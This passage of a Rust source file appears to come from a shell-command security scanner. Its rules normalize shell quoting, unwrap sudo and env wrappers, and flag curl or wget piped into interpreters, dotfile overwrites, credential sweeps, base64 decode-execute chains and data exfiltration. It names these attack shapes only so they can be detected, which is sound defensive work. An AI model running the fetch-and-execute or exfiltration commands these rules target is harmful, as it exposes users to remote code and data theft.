tirith_core/rules/
command.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::extract::ScanContext;
5use crate::redact;
6use crate::tokenize::{self, ShellType};
7use crate::verdict::{Evidence, Finding, RuleId, Severity};
8
9/// Canonical list of known interpreters (lowercase).
10/// Used by `is_interpreter()` and validated against tier-1 regex by drift test.
11pub const INTERPRETERS: &[&str] = &[
12    "sh",
13    "bash",
14    "zsh",
15    "dash",
16    "ksh",
17    "fish",
18    "csh",
19    "tcsh",
20    "ash",
21    "mksh",
22    "python",
23    "python2",
24    "python3",
25    "node",
26    "deno",
27    "bun",
28    "perl",
29    "ruby",
30    "php",
31    "lua",
32    "tclsh",
33    "elixir",
34    "rscript",
35    "pwsh",
36    "iex",
37    "invoke-expression",
38    "cmd",
39];
40
41/// Parse up to `max_digits` from `chars[*i..]` matching `predicate`, interpret as
42/// base-`radix`, and return the corresponding char. Advances `*i` past consumed digits.
43/// Zero heap allocations — uses a fixed stack buffer.
44fn parse_numeric_escape(
45    chars: &[char],
46    i: &mut usize,
47    max_digits: usize,
48    radix: u32,
49    predicate: fn(&char) -> bool,
50) -> Option<char> {
51    let mut buf = [0u8; 8];
52    let mut n = 0;
53    for _ in 0..max_digits {
54        if *i < chars.len() && predicate(&chars[*i]) {
55            buf[n] = chars[*i] as u8;
56            n += 1;
57            *i += 1;
58        } else {
59            break;
60        }
61    }
62    if n == 0 {
63        return None;
64    }
65    let s = std::str::from_utf8(&buf[..n]).ok()?;
66    let val = u32::from_str_radix(s, radix).ok()?;
67    char::from_u32(val)
68}
69
70/// Strip all shell quoting/escaping from a token, producing the effective string
71/// the shell would see after expansion.
72///
73/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
74/// escaping (POSIX) and backtick escaping (PowerShell).
75fn normalize_shell_token(input: &str, shell: ShellType) -> String {
76    #[derive(PartialEq)]
77    enum QState {
78        Normal,
79        Single,
80        Double,
81        AnsiC,
82    }
83
84    let chars: Vec<char> = input.chars().collect();
85    let len = chars.len();
86    let mut out = String::with_capacity(len);
87    let mut i = 0;
88    let is_ps = matches!(shell, ShellType::PowerShell);
89    let is_cmd = matches!(shell, ShellType::Cmd);
90    let mut state = QState::Normal;
91
92    while i < len {
93        match state {
94            QState::Normal => {
95                let ch = chars[i];
96                if is_cmd && ch == '^' && i + 1 < len {
97                    // Cmd caret escape: skip caret, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
101                    // POSIX backslash escape: skip backslash, take next char literal
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if is_ps && ch == '`' && i + 1 < len {
105                    // PowerShell backtick escape
106                    out.push(chars[i + 1]);
107                    i += 2;
108                } else if ch == '\'' && !is_cmd {
109                    state = QState::Single;
110                    i += 1;
111                } else if ch == '"' {
112                    state = QState::Double;
113                    i += 1;
114                } else if shell == ShellType::Posix
115                    && ch == '$'
116                    && i + 1 < len
117                    && chars[i + 1] == '\''
118                {
119                    state = QState::AnsiC;
120                    i += 2;
121                } else {
122                    out.push(ch);
123                    i += 1;
124                }
125            }
126            // SINGLE_QUOTE: everything literal until closing '
127            QState::Single => {
128                if chars[i] == '\'' {
129                    // PowerShell: '' inside single quotes is an escaped literal '
130                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
131                        out.push('\'');
132                        i += 2;
133                    } else {
134                        state = QState::Normal;
135                        i += 1;
136                    }
137                } else {
138                    out.push(chars[i]);
139                    i += 1;
140                }
141            }
142            // DOUBLE_QUOTE
143            QState::Double => {
144                if chars[i] == '"' {
145                    state = QState::Normal;
146                    i += 1;
147                } else if is_cmd && chars[i] == '^' && i + 1 < len {
148                    // Cmd caret escaping is still active inside double quotes.
149                    out.push(chars[i + 1]);
150                    i += 2;
151                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
152                    // POSIX: only \", \\, \$, \` are special inside double quotes
153                    let next = chars[i + 1];
154                    if next == '"' || next == '\\' || next == '$' || next == '`' {
155                        out.push(next);
156                        i += 2;
157                    } else {
158                        // literal backslash
159                        out.push('\\');
160                        out.push(next);
161                        i += 2;
162                    }
163                } else if is_ps && chars[i] == '`' && i + 1 < len {
164                    // PowerShell backtick escape inside double quotes
165                    out.push(chars[i + 1]);
166                    i += 2;
167                } else {
168                    out.push(chars[i]);
169                    i += 1;
170                }
171            }
172            // ANSIC_QUOTE (POSIX only): decode escape sequences
173            QState::AnsiC => {
174                if chars[i] == '\'' {
175                    state = QState::Normal;
176                    i += 1;
177                } else if chars[i] == '\\' && i + 1 < len {
178                    let esc = chars[i + 1];
179                    match esc {
180                        'n' => {
181                            out.push('\n');
182                            i += 2;
183                        }
184                        't' => {
185                            out.push('\t');
186                            i += 2;
187                        }
188                        'r' => {
189                            out.push('\r');
190                            i += 2;
191                        }
192                        '\\' => {
193                            out.push('\\');
194                            i += 2;
195                        }
196                        '\'' => {
197                            out.push('\'');
198                            i += 2;
199                        }
200                        '"' => {
201                            out.push('"');
202                            i += 2;
203                        }
204                        'a' => {
205                            out.push('\x07');
206                            i += 2;
207                        }
208                        'b' => {
209                            out.push('\x08');
210                            i += 2;
211                        }
212                        'e' | 'E' => {
213                            out.push('\x1b');
214                            i += 2;
215                        }
216                        'f' => {
217                            out.push('\x0c');
218                            i += 2;
219                        }
220                        'v' => {
221                            out.push('\x0b');
222                            i += 2;
223                        }
224                        'x' => {
225                            // \xHH — 1 or 2 hex digits
226                            i += 2;
227                            if let Some(c) =
228                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
229                            {
230                                out.push(c);
231                            }
232                        }
233                        'u' => {
234                            // \uHHHH — 1 to 4 hex digits
235                            i += 2;
236                            if let Some(c) =
237                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
238                            {
239                                out.push(c);
240                            }
241                        }
242                        'U' => {
243                            // \UHHHHHHHH — 1 to 8 hex digits
244                            i += 2;
245                            if let Some(c) =
246                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
247                            {
248                                out.push(c);
249                            }
250                        }
251                        c if c.is_ascii_digit() && c <= '7' => {
252                            // \NNN octal — 1 to 3 octal digits
253                            i += 1; // skip backslash
254                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
255                                c.is_ascii_digit() && *c <= '7'
256                            }) {
257                                out.push(c);
258                            }
259                        }
260                        _ => {
261                            // Unknown escape: emit literal
262                            out.push('\\');
263                            out.push(esc);
264                            i += 2;
265                        }
266                    }
267                } else {
268                    out.push(chars[i]);
269                    i += 1;
270                }
271            }
272        }
273    }
274    out
275}
276
277/// Extract the effective command base name from a raw token.
278///
279/// Normalize → path basename → first word → lowercase → strip .exe
280fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
281    let normalized = normalize_shell_token(raw.trim(), shell);
282    basename_from_normalized(&normalized, shell)
283}
284
285/// Extract basename from an already-normalized (unquoted) string.
286/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
287fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
288    let has_path_sep = match shell {
289        ShellType::PowerShell | ShellType::Cmd => {
290            normalized.contains('/') || normalized.contains('\\')
291        }
292        _ => normalized.contains('/'),
293    };
294    let after_path = if has_path_sep {
295        match shell {
296            ShellType::PowerShell | ShellType::Cmd => {
297                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
298            }
299            _ => normalized.rsplit('/').next().unwrap_or(normalized),
300        }
301    } else {
302        normalized
303    };
304    let first_word = after_path.split_whitespace().next().unwrap_or("");
305    let lower = first_word.to_lowercase();
306    if lower.ends_with(".exe") {
307        lower[..lower.len() - 4].to_string()
308    } else {
309        lower
310    }
311}
312
313fn is_interpreter(cmd: &str) -> bool {
314    INTERPRETERS.contains(&cmd)
315}
316
317/// Run command-shape rules.
318pub fn check(
319    input: &str,
320    shell: ShellType,
321    cwd: Option<&str>,
322    scan_context: ScanContext,
323) -> Vec<Finding> {
324    let mut findings = Vec::new();
325    let segments = tokenize::tokenize(input, shell);
326
327    // Check for pipe-to-interpreter patterns
328    let has_pipe = segments.iter().any(|s| {
329        s.preceding_separator.as_deref() == Some("|")
330            || s.preceding_separator.as_deref() == Some("|&")
331    });
332    if has_pipe {
333        check_pipe_to_interpreter(&segments, shell, &mut findings);
334    }
335
336    // Check for insecure TLS flags in source commands
337    for segment in &segments {
338        if let Some(ref cmd) = segment.command {
339            let cmd_base = normalize_cmd_base(cmd, shell);
340            if is_source_command(&cmd_base) {
341                let tls_findings =
342                    crate::rules::transport::check_insecure_flags(&segment.args, true);
343                findings.extend(tls_findings);
344            }
345        }
346    }
347
348    // Check for dotfile overwrites
349    check_dotfile_overwrite(&segments, &mut findings);
350
351    // Check for archive extraction to sensitive paths
352    check_archive_extract(&segments, &mut findings);
353
354    // Check for process memory access
355    check_proc_mem_access(&segments, shell, &mut findings);
356
357    // Check for Docker remote privilege escalation
358    check_docker_remote_privesc(&segments, shell, &mut findings);
359
360    // Check for credential file sweep (exec-only)
361    check_credential_file_sweep(&segments, shell, scan_context, &mut findings);
362
363    // Check for cargo install/add without supply-chain audit (exec-only)
364    if scan_context == ScanContext::Exec {
365        check_vet_not_configured(&segments, cwd, &mut findings);
366    }
367
368    // Check for dangerous environment variable exports
369    check_env_var_in_command(&segments, &mut findings);
370
371    // Check for network destination access (metadata endpoints, private networks)
372    check_network_destination(&segments, &mut findings);
373
374    // Check for base64 decode-execute chains
375    check_base64_decode_execute(&segments, shell, &mut findings);
376
377    // Check for data exfiltration via curl/wget uploads
378    check_data_exfiltration(&segments, shell, &mut findings);
379
380    findings
381}
382
383/// Resolve the effective interpreter from a segment, handling all quoting forms,
384/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
385fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
386    if let Some(ref cmd) = seg.command {
387        let cmd_base = normalize_cmd_base(cmd, shell);
388
389        // Direct interpreter
390        if is_interpreter(&cmd_base) {
391            return Some(cmd_base);
392        }
393
394        // Subshell: (bash) → strip parens, check
395        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
396        if stripped != cmd_base && is_interpreter(stripped) {
397            return Some(stripped.to_string());
398        }
399
400        // Brace group: { → first arg is command
401        if cmd_base == "{" {
402            return resolve_from_args(&seg.args, shell);
403        }
404
405        // Known wrappers
406        match cmd_base.as_str() {
407            "sudo" => return resolve_sudo_args(&seg.args, shell),
408            "env" => return resolve_env_args(&seg.args, shell),
409            "command" | "exec" | "nohup" => {
410                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
411            }
412            _ => {}
413        }
414    }
415    None
416}
417
418/// Resolve the base command from a segment, stripping sudo/env/command/nohup/exec wrappers.
419/// Returns the normalized base command name (lowercase, .exe stripped).
420/// Unlike `resolve_interpreter_name`, this returns ANY command — not just interpreters.
421fn resolve_base_through_wrappers(seg: &tokenize::Segment, shell: ShellType) -> String {
422    let Some(ref cmd) = seg.command else {
423        return String::new();
424    };
425    let cmd_base = normalize_cmd_base(cmd, shell);
426
427    match cmd_base.as_str() {
428        "sudo" => resolve_base_sudo(&seg.args, shell).unwrap_or(cmd_base),
429        "env" => resolve_base_env(&seg.args, shell).unwrap_or(cmd_base),
430        "command" | "exec" | "nohup" => {
431            resolve_base_wrapper(&seg.args, &cmd_base, shell).unwrap_or(cmd_base)
432        }
433        _ => cmd_base,
434    }
435}
436
437/// Resolve base command through sudo wrapper.
438fn resolve_base_sudo(args: &[String], shell: ShellType) -> Option<String> {
439    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
440    let value_long_flags = [
441        "--user",
442        "--group",
443        "--close-from",
444        "--chdir",
445        "--role",
446        "--type",
447        "--other-user",
448        "--host",
449        "--timeout",
450    ];
451    let mut idx = 0;
452    while idx < args.len() {
453        let normalized = normalize_shell_token(args[idx].trim(), shell);
454        if normalized == "--" {
455            // Next positional after -- is the command
456            if idx + 1 < args.len() {
457                return Some(normalize_cmd_base(&args[idx + 1], shell));
458            }
459            return None;
460        }
461        if normalized.starts_with("--") {
462            if value_long_flags.iter().any(|f| normalized == *f) {
463                idx += 2;
464            } else {
465                idx += 1;
466            }
467            continue;
468        }
469        if normalized.starts_with('-') {
470            if value_short_flags.iter().any(|f| normalized == *f)
471                || (normalized.len() > 2
472                    && value_short_flags
473                        .iter()
474                        .any(|f| normalized.ends_with(&f[1..])))
475            {
476                idx += 2;
477            } else {
478                idx += 1;
479            }
480            continue;
481        }
482        // First positional is the command — recurse for nested wrappers
483        let base = normalize_cmd_base(&args[idx], shell);
484        return match base.as_str() {
485            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
486            "env" => resolve_base_env(&args[idx + 1..], shell),
487            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
488            _ => Some(base),
489        };
490    }
491    None
492}
493
494/// Resolve base command through env wrapper.
495fn resolve_base_env(args: &[String], shell: ShellType) -> Option<String> {
496    let value_short_flags = ["-u", "-C"];
497    let value_long_flags = [
498        "--unset",
499        "--chdir",
500        "--split-string",
501        "--block-signal",
502        "--default-signal",
503        "--ignore-signal",
504    ];
505    let mut idx = 0;
506    while idx < args.len() {
507        let normalized = normalize_shell_token(args[idx].trim(), shell);
508        if normalized == "--" {
509            if idx + 1 < args.len() {
510                return Some(normalize_cmd_base(&args[idx + 1], shell));
511            }
512            return None;
513        }
514        if normalized.starts_with("--") {
515            if normalized == "--split-string" {
516                if idx + 1 < args.len() {
517                    return resolve_base_from_command_string(&args[idx + 1], shell);
518                }
519                return None;
520            }
521            if let Some(val) = normalized.strip_prefix("--split-string=") {
522                return resolve_base_from_command_string(val, shell);
523            }
524            if value_long_flags.iter().any(|f| normalized == *f) {
525                idx += 2;
526            } else {
527                idx += 1;
528            }
529            continue;
530        }
531        if normalized == "-S" {
532            if idx + 1 < args.len() {
533                return resolve_base_from_command_string(&args[idx + 1], shell);
534            }
535            return None;
536        }
537        if normalized.starts_with('-') {
538            if value_short_flags.iter().any(|f| normalized == *f) {
539                idx += 2;
540            } else {
541                idx += 1;
542            }
543            continue;
544        }
545        // VAR=VALUE assignments
546        if normalized.contains('=') {
547            idx += 1;
548            continue;
549        }
550        // First positional is the command
551        let base = normalize_cmd_base(&args[idx], shell);
552        return match base.as_str() {
553            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
554            "env" => resolve_base_env(&args[idx + 1..], shell),
555            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
556            _ => Some(base),
557        };
558    }
559    None
560}
561
562fn resolve_base_from_command_string(command: &str, shell: ShellType) -> Option<String> {
563    let normalized = normalize_shell_token(command.trim(), shell);
564    if normalized.is_empty() {
565        return None;
566    }
567
568    let segments = tokenize::tokenize(&normalized, shell);
569    let first = segments.first()?;
570    let base = resolve_base_through_wrappers(first, shell);
571    if base.is_empty() {
572        None
573    } else {
574        Some(base)
575    }
576}
577
578fn unwrap_env_split_string_segment(
579    seg: &tokenize::Segment,
580    shell: ShellType,
581) -> Option<tokenize::Segment> {
582    let command = seg.command.as_ref()?;
583    if normalize_cmd_base(command, shell) != "env" {
584        return None;
585    }
586
587    let value_short_flags = ["-u", "-C"];
588    let value_long_flags = [
589        "--unset",
590        "--chdir",
591        "--block-signal",
592        "--default-signal",
593        "--ignore-signal",
594    ];
595
596    let args = &seg.args;
597    let mut idx = 0;
598    while idx < args.len() {
599        let normalized = normalize_shell_token(args[idx].trim(), shell);
600        if normalized == "--split-string" || normalized == "-S" {
601            let command = args.get(idx + 1)?;
602            let normalized_command = normalize_shell_token(command.trim(), shell);
603            return tokenize::tokenize(&normalized_command, shell)
604                .into_iter()
605                .next();
606        }
607        if let Some(val) = normalized.strip_prefix("--split-string=") {
608            let normalized_command = normalize_shell_token(val.trim(), shell);
609            return tokenize::tokenize(&normalized_command, shell)
610                .into_iter()
611                .next();
612        }
613        if normalized == "--" {
614            return None;
615        }
616        if normalized.starts_with("--") {
617            if value_long_flags.iter().any(|f| normalized == *f) {
618                idx += 2;
619            } else {
620                idx += 1;
621            }
622            continue;
623        }
624        if normalized.starts_with('-') {
625            if value_short_flags.iter().any(|f| normalized == *f) {
626                idx += 2;
627            } else {
628                idx += 1;
629            }
630            continue;
631        }
632        if normalized.contains('=') {
633            idx += 1;
634            continue;
635        }
636        return None;
637    }
638    None
639}
640
641/// Resolve base command through command/exec/nohup wrappers.
642fn resolve_base_wrapper(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
643    let value_flags: &[&str] = match wrapper {
644        "exec" => &["-a"],
645        _ => &[],
646    };
647    let mut idx = 0;
648    while idx < args.len() {
649        let normalized = normalize_shell_token(args[idx].trim(), shell);
650        if normalized == "--" {
651            if idx + 1 < args.len() {
652                return Some(normalize_cmd_base(&args[idx + 1], shell));
653            }
654            return None;
655        }
656        if normalized.starts_with("--") || normalized.starts_with('-') {
657            if value_flags.iter().any(|f| normalized == *f) {
658                idx += 2;
659            } else {
660                idx += 1;
661            }
662            continue;
663        }
664        let base = normalize_cmd_base(&args[idx], shell);
665        return match base.as_str() {
666            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
667            "env" => resolve_base_env(&args[idx + 1..], shell),
668            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
669            _ => Some(base),
670        };
671    }
672    None
673}
674
675#[derive(Clone, Copy)]
676enum ResolverParser {
677    Generic,
678    Sudo,
679    Env,
680    Command,
681    Exec,
682    Nohup,
683}
684
685enum ResolveStep<'a> {
686    Found(String),
687    Next {
688        parser: ResolverParser,
689        args: &'a [String],
690        inspected: usize,
691    },
692    Stop,
693}
694
695/// Resolve interpreter from a generic arg list. Uses an iterative parser with a
696/// token-inspection budget so deeply nested wrappers cannot bypass detection.
697fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
698    resolve_with_parser(args, shell, ResolverParser::Generic)
699}
700
701fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
702    resolve_with_parser(args, shell, ResolverParser::Sudo)
703}
704
705fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
706    resolve_with_parser(args, shell, ResolverParser::Env)
707}
708
709fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
710    let parser = match wrapper {
711        "command" => ResolverParser::Command,
712        "exec" => ResolverParser::Exec,
713        "nohup" => ResolverParser::Nohup,
714        _ => ResolverParser::Command,
715    };
716    resolve_with_parser(args, shell, parser)
717}
718
719fn resolve_with_parser(
720    args: &[String],
721    shell: ShellType,
722    start_parser: ResolverParser,
723) -> Option<String> {
724    if args.is_empty() {
725        return None;
726    }
727
728    let mut parser = start_parser;
729    let mut current = args;
730    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
731    let mut budget = args.len().saturating_mul(4).saturating_add(8);
732
733    while budget > 0 && !current.is_empty() {
734        let step = match parser {
735            ResolverParser::Generic => resolve_step_generic(current, shell),
736            ResolverParser::Sudo => resolve_step_sudo(current, shell),
737            ResolverParser::Env => resolve_step_env(current, shell),
738            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
739            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
740            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
741        };
742
743        match step {
744            ResolveStep::Found(interpreter) => return Some(interpreter),
745            ResolveStep::Stop => return None,
746            ResolveStep::Next {
747                parser: next_parser,
748                args: next_args,
749                inspected,
750            } => {
751                parser = next_parser;
752                current = next_args;
753                budget = budget.saturating_sub(inspected.max(1));
754            }
755        }
756    }
757    None
758}
759
760fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
761    let mut idx = 0;
762    let mut seen_dashdash = false;
763    while idx < args.len() {
764        let raw = args[idx].trim();
765        let normalized = normalize_shell_token(raw, shell);
766
767        // Track end-of-options marker
768        if normalized == "--" {
769            seen_dashdash = true;
770            idx += 1;
771            continue;
772        }
773
774        // Skip flags and assignments (only before --)
775        if !seen_dashdash
776            && (normalized.starts_with("--")
777                || normalized.starts_with('-')
778                || normalized.contains('='))
779        {
780            idx += 1;
781            continue;
782        }
783
784        let base = basename_from_normalized(&normalized, shell);
785        return match base.as_str() {
786            "sudo" => ResolveStep::Next {
787                parser: ResolverParser::Sudo,
788                args: &args[idx + 1..],
789                inspected: idx + 1,
790            },
791            "env" => ResolveStep::Next {
792                parser: ResolverParser::Env,
793                args: &args[idx + 1..],
794                inspected: idx + 1,
795            },
796            "command" => ResolveStep::Next {
797                parser: ResolverParser::Command,
798                args: &args[idx + 1..],
799                inspected: idx + 1,
800            },
801            "exec" => ResolveStep::Next {
802                parser: ResolverParser::Exec,
803                args: &args[idx + 1..],
804                inspected: idx + 1,
805            },
806            "nohup" => ResolveStep::Next {
807                parser: ResolverParser::Nohup,
808                args: &args[idx + 1..],
809                inspected: idx + 1,
810            },
811            _ if is_interpreter(&base) => ResolveStep::Found(base),
812            _ => ResolveStep::Stop,
813        };
814    }
815    ResolveStep::Stop
816}
817
818fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
819    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
820    let value_long_flags = [
821        "--user",
822        "--group",
823        "--close-from",
824        "--chdir",
825        "--role",
826        "--type",
827        "--other-user",
828        "--host",
829        "--timeout",
830    ];
831
832    let mut idx = 0;
833    while idx < args.len() {
834        let raw = args[idx].trim();
835        let normalized = normalize_shell_token(raw, shell);
836        // -- ends option parsing; remaining args are the command
837        if normalized == "--" {
838            return ResolveStep::Next {
839                parser: ResolverParser::Generic,
840                args: &args[(idx + 1).min(args.len())..],
841                inspected: idx + 1,
842            };
843        }
844        if normalized.starts_with("--") {
845            if value_long_flags.iter().any(|f| normalized == *f) {
846                idx += 2;
847                continue;
848            }
849            if let Some((key, _)) = normalized.split_once('=') {
850                if value_long_flags.contains(&key) {
851                    idx += 1;
852                    continue;
853                }
854            }
855            // Unknown long flag: treat as boolean.
856            idx += 1;
857            continue;
858        }
859        if normalized.starts_with('-') {
860            if value_short_flags.iter().any(|f| normalized == *f) {
861                // Exact match: e.g. -u → next arg is the value
862                idx += 2;
863            } else if normalized.len() > 2
864                && value_short_flags.iter().any(|f| {
865                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
866                })
867            {
868                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
869                idx += 2;
870            } else {
871                idx += 1;
872            }
873            continue;
874        }
875        return ResolveStep::Next {
876            parser: ResolverParser::Generic,
877            args: &args[idx..],
878            inspected: idx + 1,
879        };
880    }
881    ResolveStep::Stop
882}
883
884fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
885    let value_short_flags = ["-u", "-C"];
886    let value_long_flags = [
887        "--unset",
888        "--chdir",
889        "--split-string",
890        "--block-signal",
891        "--default-signal",
892        "--ignore-signal",
893    ];
894
895    let mut idx = 0;
896    while idx < args.len() {
897        let raw = args[idx].trim();
898        let normalized = normalize_shell_token(raw, shell);
899        // -- ends option parsing; remaining args are the command
900        if normalized == "--" {
901            return ResolveStep::Next {
902                parser: ResolverParser::Generic,
903                args: &args[(idx + 1).min(args.len())..],
904                inspected: idx + 1,
905            };
906        }
907        if normalized.starts_with("--") {
908            // --split-string: value is a command string.
909            if normalized == "--split-string" {
910                if idx + 1 < args.len() {
911                    let base = normalize_cmd_base(&args[idx + 1], shell);
912                    if is_interpreter(&base) {
913                        return ResolveStep::Found(base);
914                    }
915                }
916                idx += 2;
917                continue;
918            }
919            if let Some(val) = normalized.strip_prefix("--split-string=") {
920                let base = normalize_cmd_base(val, shell);
921                if is_interpreter(&base) {
922                    return ResolveStep::Found(base);
923                }
924                idx += 1;
925                continue;
926            }
927            if value_long_flags.iter().any(|f| normalized == *f) {
928                idx += 2;
929                continue;
930            }
931            if let Some((key, _)) = normalized.split_once('=') {
932                if value_long_flags.contains(&key) {
933                    idx += 1;
934                    continue;
935                }
936            }
937            // Unknown long flag: treat as boolean.
938            idx += 1;
939            continue;
940        }
941        if normalized == "-S" {
942            // -S: value is a command string.
943            if idx + 1 < args.len() {
944                let base = normalize_cmd_base(&args[idx + 1], shell);
945                if is_interpreter(&base) {
946                    return ResolveStep::Found(base);
947                }
948            }
949            idx += 2;
950            continue;
951        }
952        if normalized.starts_with('-') {
953            if value_short_flags.iter().any(|f| normalized == *f) {
954                idx += 2;
955            } else {
956                idx += 1;
957            }
958            continue;
959        }
960        if normalized.contains('=') {
961            idx += 1;
962            continue;
963        }
964        return ResolveStep::Next {
965            parser: ResolverParser::Generic,
966            args: &args[idx..],
967            inspected: idx + 1,
968        };
969    }
970    ResolveStep::Stop
971}
972
973fn resolve_step_wrapper<'a>(
974    args: &'a [String],
975    shell: ShellType,
976    wrapper: &str,
977) -> ResolveStep<'a> {
978    let value_flags: &[&str] = match wrapper {
979        "exec" => &["-a"],
980        _ => &[],
981    };
982
983    let mut idx = 0;
984    while idx < args.len() {
985        let raw = args[idx].trim();
986        let normalized = normalize_shell_token(raw, shell);
987        // -- ends option parsing; remaining args are the command
988        if normalized == "--" {
989            return ResolveStep::Next {
990                parser: ResolverParser::Generic,
991                args: &args[(idx + 1).min(args.len())..],
992                inspected: idx + 1,
993            };
994        }
995        if normalized.starts_with("--") || normalized.starts_with('-') {
996            if value_flags.iter().any(|f| normalized == *f) {
997                idx += 2;
998            } else {
999                idx += 1;
1000            }
1001            continue;
1002        }
1003        return ResolveStep::Next {
1004            parser: ResolverParser::Generic,
1005            args: &args[idx..],
1006            inspected: idx + 1,
1007        };
1008    }
1009    ResolveStep::Stop
1010}
1011
1012fn check_pipe_to_interpreter(
1013    segments: &[tokenize::Segment],
1014    shell: ShellType,
1015    findings: &mut Vec<Finding>,
1016) {
1017    for (i, seg) in segments.iter().enumerate() {
1018        if i == 0 {
1019            continue;
1020        }
1021        if let Some(sep) = &seg.preceding_separator {
1022            if sep == "|" || sep == "|&" {
1023                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
1024                    // i > 0 is guaranteed — the loop skips i == 0 above.
1025                    let source = &segments[i - 1];
1026                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
1027                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
1028                    let source_is_tirith_run = source_base == "tirith"
1029                        && source
1030                            .args
1031                            .first()
1032                            .map(|arg| normalize_cmd_base(arg, shell) == "run")
1033                            .unwrap_or(false);
1034                    let source_label = if source_is_tirith_run {
1035                        "tirith run".to_string()
1036                    } else {
1037                        source_base.clone()
1038                    };
1039
1040                    // Skip if the source is tirith itself — its output is trusted.
1041                    if source_base == "tirith" && !source_is_tirith_run {
1042                        continue;
1043                    }
1044
1045                    let rule_id = match source_base.as_str() {
1046                        "curl" => RuleId::CurlPipeShell,
1047                        "wget" => RuleId::WgetPipeShell,
1048                        "http" | "https" => RuleId::HttpiePipeShell,
1049                        "xh" => RuleId::XhPipeShell,
1050                        _ => RuleId::PipeToInterpreter,
1051                    };
1052
1053                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
1054
1055                    let base_desc = format!(
1056                        "Command pipes output from '{source_label}' directly to \
1057                         interpreter '{interpreter}'. Downloaded content will be \
1058                         executed without inspection."
1059                    );
1060
1061                    let description = if is_url_fetch_command(&source_base) {
1062                        let show_tirith_run = cfg!(unix)
1063                            && supports_tirith_run_hint(&source_base)
1064                            && shell != ShellType::PowerShell;
1065                        if let Some(url) = extract_urls_from_args(&source.args, shell)
1066                            .into_iter()
1067                            .next()
1068                            .map(|u| sanitize_url_for_display(&u))
1069                        {
1070                            if show_tirith_run {
1071                                format!(
1072                                    "{base_desc}\n  Safer: tirith run {url}  \
1073                                     \u{2014} or: vet {url}  (https://getvet.sh)"
1074                                )
1075                            } else {
1076                                format!(
1077                                    "{base_desc}\n  Safer: vet {url}  \
1078                                     (https://getvet.sh)"
1079                                )
1080                            }
1081                        } else if show_tirith_run {
1082                            format!(
1083                                "{base_desc}\n  Safer: use 'tirith run <url>' \
1084                                 or 'vet <url>' (https://getvet.sh) to inspect \
1085                                 before executing."
1086                            )
1087                        } else {
1088                            format!(
1089                                "{base_desc}\n  Safer: use 'vet <url>' \
1090                                 (https://getvet.sh) to inspect before executing."
1091                            )
1092                        }
1093                    } else {
1094                        base_desc
1095                    };
1096
1097                    let mut evidence = vec![Evidence::CommandPattern {
1098                        pattern: "pipe to interpreter".to_string(),
1099                        matched: redact::redact_shell_assignments(&format!(
1100                            "{} | {}",
1101                            source.raw, seg.raw
1102                        )),
1103                    }];
1104                    for url in extract_urls_from_args(&source.args, shell) {
1105                        evidence.push(Evidence::Url { raw: url });
1106                    }
1107
1108                    findings.push(Finding {
1109                        rule_id,
1110                        severity: Severity::High,
1111                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
1112                        description,
1113                        evidence,
1114                        human_view: None,
1115                        agent_view: None,
1116                        mitre_id: None,
1117                        custom_rule_id: None,
1118                    });
1119                }
1120            }
1121        }
1122    }
1123}
1124
1125fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1126    for segment in segments {
1127        // Check for redirects to dotfiles
1128        let raw = &segment.raw;
1129        if (raw.contains("> ~/.")
1130            || raw.contains("> $HOME/.")
1131            || raw.contains(">> ~/.")
1132            || raw.contains(">> $HOME/."))
1133            && !raw.contains("> /dev/null")
1134        {
1135            findings.push(Finding {
1136                rule_id: RuleId::DotfileOverwrite,
1137                severity: Severity::High,
1138                title: "Dotfile overwrite detected".to_string(),
1139                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
